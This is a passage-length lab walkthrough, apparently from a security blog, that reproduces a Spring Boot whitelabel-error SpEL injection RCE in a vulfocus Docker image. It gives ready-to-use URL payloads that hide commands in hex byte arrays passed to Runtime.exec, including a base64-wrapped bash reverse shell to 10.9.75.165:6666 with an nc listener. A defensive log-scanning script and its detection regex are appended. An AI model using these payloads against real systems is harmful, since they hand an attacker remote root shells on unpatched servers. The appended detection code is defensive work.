Reproducing the Spring Boot Remote Code Execution SpEL RCE (Deserialization) Vulnerability
Table of contents
- Reproducing the Spring Boot Remote Code Execution SpEL RCE (Deserialization) Vulnerability
- 1 Online vulnerability lab environment
- 1.1 How the vulnerability works
- 2 Setting up the environment
- 2.1 Pull the lab image with a command
- 2.2 Inspect the pulled image
- 2.3 Docker container operations
- 2.4 Start the container and visit the page `:9001/`
- 3 Reproducing the vulnerability
- 3.1 Enter /article?id=${66}
- 4 Exploiting the vulnerability
- 4.1 Writing the reverse-shell script: creating a file
- 4.1.1 First create a file with a command
- 4.1.2 Convert the command to hex with a Python script, file name 1.py
- 4.1.3 Script output and assembling the final payload
- 4.1.4 Press Enter; the page returns the error message [java.lang.UNIXProcess@50353b7]
- 4.1.5 Enter the container: the file was created, confirming shell commands execute
- 4.2 Writing the reverse-shell script
- 4.3 Triggering the reverse shell from the browser
- 4.4 Reverse shell received, root obtained
1 Online vulnerability lab environment
1.1 How the vulnerability works
1. When Spring Boot fails to process a parameter value, control flows into the org.springframework.util.PropertyPlaceholderHelper class.
2. There the parameter values from the URL are parsed recursively by the parseStringValue method. Anything wrapped in ${} is handed to the resolvePlaceholder method of the org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration class, which evaluates it as a SpEL expression, resulting in an RCE vulnerability.
2 Setting up the environment
2.1 Pull the lab image with a command
docker pull vulfocus/spring-boot_whitelabel_spel:latest
2.2 Inspect the pulled image
┌──(kali💋kali)-[/var/lib/docker]
└─$ sudo docker images
2.3 Docker container operations
sudo docker images # list local images and their repositories
sudo docker exec -it <container_name_or_id> /bin/bash # open a shell inside the container (inside it, the application listens on port 9090)
sudo docker run -d -p 9001:9090 vulfocus/spring-boot_whitelabel_spel # start the lab, mapping host port 9001 to container port 9090
sudo docker ps -a # show the status of all containers
sudo docker inspect <container_name_or_id> # show detailed information about the container
sudo docker stop f30 # stop the container; f30 is the abbreviated container id
2.4 Start the container and visit the page :9001/
3 Reproducing the vulnerability
3.1 Enter /article?id=${66}
Request /article?id=${66}. If the error page shows 66 (the expression was evaluated and its result rendered), the target almost certainly has a SpEL expression injection vulnerability.
4 Exploiting the vulnerability
4.1 Writing the reverse-shell script: creating a file
4.1.1 First create a file with a command
touch /tmp/success1 # the file-creation command
bash -c {echo,dG91Y2ggL3RtcC9zdWNjZXNzMQ==}|{base64,-d}|{bash,-i} # the same command wrapped as base64 (avoids spaces and slashes in the payload)
4.1.2 Convert the command to hex with a Python script, file name 1.py
result = ""
# the command to encode: the base64-wrapped file-creation command from 4.1.1
target = 'bash -c {echo,dG91Y2ggL3RtcC9zdWNjZXNzMQ==}|{base64,-d}|{bash,-i}'
# emit each character as a 0x-prefixed hex byte, comma separated, for a Java byte[] literal
for x in target:
    result += hex(ord(x)) + ","
print(result.rstrip(','))
4.1.3 Script output and assembling the final payload
=========== 1. Encoded output ============
0x62,0x61,0x73,0x68,0x20,0x2d,0x63,0x20,0x7b,0x65,0x63,0x68,0x6f,0x2c,0x64,0x47,0x39,0x31,0x59,0x32,0x67,0x67,0x4c,0x33,0x52,0x74,0x63,0x43,0x39,0x7a,0x64,0x57,0x4e,0x6a,0x5a,0x58,0x4e,0x7a,0x4d,0x51,0x3d,0x3d,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x65,0x36,0x34,0x2c,0x2d,0x64,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x68,0x2c,0x2d,0x69,0x7d
=========== 2. Paste the encoded hex into the new%20byte[]{hex bytes} below ======
/article?id=${T(java.lang.Runtime).getRuntime().exec(new%20String(new%20byte[]{}))}
============== 3. Final combined payload ===============
/article?id=${T(java.lang.Runtime).getRuntime().exec(new%20String(new%20byte[]{0x62,0x61,0x73,0x68,0x20,0x2d,0x63,0x20,0x7b,0x65,0x63,0x68,0x6f,0x2c,0x64,0x47,0x39,0x31,0x59,0x32,0x67,0x67,0x4c,0x33,0x52,0x74,0x63,0x43,0x39,0x7a,0x64,0x57,0x4e,0x6a,0x5a,0x58,0x4e,0x7a,0x4d,0x51,0x3d,0x3d,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x65,0x36,0x34,0x2c,0x2d,0x64,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x68,0x2c,0x2d,0x69,0x7d}))}
4.1.4 Press Enter; the page returns the error message [java.lang.UNIXProcess@50353b7] (the string form of the Process object returned by exec, which shows the expression ran)
4.1.5 Enter the container: the file was created, confirming that shell commands can be executed
4.2 Writing the reverse-shell script
============ 1. Reverse-shell commands =============
nc -lvp 6666 # -l is listen mode; -v prints verbose information; -p sets the port
bash -i &>/dev/tcp/10.9.75.165/6666 0<&1 # interactive shell redirected over a TCP connection
============== 2. Reverse-shell command encoded as base64 =============
bash -c {echo,YmFzaCAtaSAmPiAvZGV2L3RjcC8xMC45Ljc1LjE2NS82NjY2IDA8JjE=}|{base64,-d}|{bash,-i}
=============== 3. Reverse-shell command converted to hex ==========
0x62,0x61,0x73,0x68,0x20,0x2d,0x63,0x20,0x7b,0x65,0x63,0x68,0x6f,0x2c,0x59,0x6d,0x46,0x7a,0x61,0x43,0x41,0x74,0x61,0x53,0x41,0x6d,0x50,0x69,0x41,0x76,0x5a,0x47,0x56,0x32,0x4c,0x33,0x52,0x6a,0x63,0x43,0x38,0x78,0x4d,0x43,0x34,0x35,0x4c,0x6a,0x63,0x31,0x4c,0x6a,0x45,0x32,0x4e,0x53,0x38,0x32,0x4e,0x6a,0x59,0x32,0x49,0x44,0x41,0x38,0x4a,0x6a,0x45,0x3d,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x65,0x36,0x34,0x2c,0x2d,0x64,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x68,0x2c,0x2d,0x69,0x7d
========== 4. Paste the encoded hex into the new%20byte[]{hex bytes} below ======
/article?id=${T(java.lang.Runtime).getRuntime().exec(new%20String(new%20byte[]{}))}
============== 5. Final combined payload ===============
/article?id=${T(java.lang.Runtime).getRuntime().exec(new%20String(new%20byte[]{0x62,0x61,0x73,0x68,0x20,0x2d,0x63,0x20,0x7b,0x65,0x63,0x68,0x6f,0x2c,0x59,0x6d,0x46,0x7a,0x61,0x43,0x41,0x74,0x61,0x53,0x41,0x6d,0x50,0x69,0x41,0x76,0x5a,0x47,0x56,0x32,0x4c,0x33,0x52,0x6a,0x63,0x43,0x38,0x78,0x4d,0x43,0x34,0x35,0x4c,0x6a,0x63,0x31,0x4c,0x6a,0x45,0x32,0x4e,0x53,0x38,0x32,0x4e,0x6a,0x59,0x32,0x49,0x44,0x41,0x38,0x4a,0x6a,0x45,0x3d,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x65,0x36,0x34,0x2c,0x2d,0x64,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x68,0x2c,0x2d,0x69,0x7d}))}
4.3 Triggering the reverse shell from the browser
4.4 Reverse shell received, root obtained
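From the defender's side, the probe in 3.1 and the Runtime.exec payloads in 4.1 and 4.2 leave a fixed shape in access logs: a ${...} placeholder in the id parameter, and for the RCE variant a new byte[]{0x..} array that hides the command. The script below is an added example, not part of the original post or of the vulfocus image; it scans constructed sample log lines (log format and addresses are made up), flags placeholder injection, and decodes the byte array back to the command for triage.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original post). Line 2 is the
# 3.1 probe; line 3 carries a payload of the same shape as section 4 with the
# constructed command "touch /tmp/x" hidden in the byte array.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /article?id=42 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /article?id=${66} HTTP/1.1" 500 1024
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /article?id=${T(java.lang.Runtime).getRuntime().exec(new%20String(new%20byte[]{0x74,0x6f,0x75,0x63,0x68,0x20,0x2f,0x74,0x6d,0x70,0x2f,0x78}))} HTTP/1.1" 500 1024
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
PLACEHOLDER_RE = re.compile(r'\$\{(.*)\}', re.DOTALL)   # greedy: keep nested braces
BYTE_ARRAY_RE = re.compile(r'new byte\[\]\{([0-9a-fA-Fx, ]+)\}')


def decode_byte_array(expr):
    """Rebuild the string a SpEL `new String(new byte[]{...})` would produce."""
    m = BYTE_ARRAY_RE.search(expr)
    if not m:
        return None
    values = [int(v, 16) for v in m.group(1).split(',') if v.strip()]
    return bytes(values).decode('utf-8', errors='replace')


def classify_request(url):
    """Return a finding dict for a ${...} placeholder in the URL, else None."""
    decoded = unquote(url)          # browsers often encode ${ as %24%7B
    m = PLACEHOLDER_RE.search(decoded)
    if not m:
        return None
    expr = m.group(1)
    finding = {"placeholder": expr, "severity": "probe", "command": None}
    # T(...) type references, getRuntime and exec mark the RCE pattern from section 4
    if "T(" in expr or "getRuntime" in expr or ".exec(" in expr:
        finding["severity"] = "rce_attempt"
        finding["command"] = decode_byte_array(expr)
    return finding


def scan_log(text):
    """Run classify_request over every request line and collect the findings."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m:
            finding = classify_request(m.group(1))
            if finding:
                findings.append(finding)
    return findings
```

Pairing a flagged request with a 500 response on the whitelabel error page, as in lines 2 and 3, is the strongest signal, since the placeholder is only evaluated on the error path described in 1.1.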